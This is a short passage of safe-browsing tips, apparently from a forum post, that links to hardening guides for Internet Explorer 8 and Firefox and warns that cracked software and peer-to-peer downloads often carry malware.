9) A tool (http://nsslabs.com/general/ie8-hardening-tool.html) for automatically hardening and securing Internet Explorer 8.0. Requires site registration for downloading. Changes some of the default settings of IE 8.0; read the FAQs. Or see a slide show here (http://threatpost.com/en_us/slideshow/How%20to%20configure%20Internet%20Explorer%20for%20secure%20surfing) and do it yourself. How to harden FireFox (http://threatpost.com/en_us/slideshow/How-to-configure-Mozilla-Firefox-for-secure-surfing?utm_source=Second+Sidebar&utm_medium=Featured+Slideshows&utm_campaign=Configure+Mozilla+Firefox) for safer surfing.

10) Warez, cracks etc are very popular for carrying malware payloads. If you look for these you will encounter malware. If you download/install files via p2p networks you will encounter malware. Can you really trust the source of the file?


More info/tips with pictures in links below.

Happy Safe Surfing.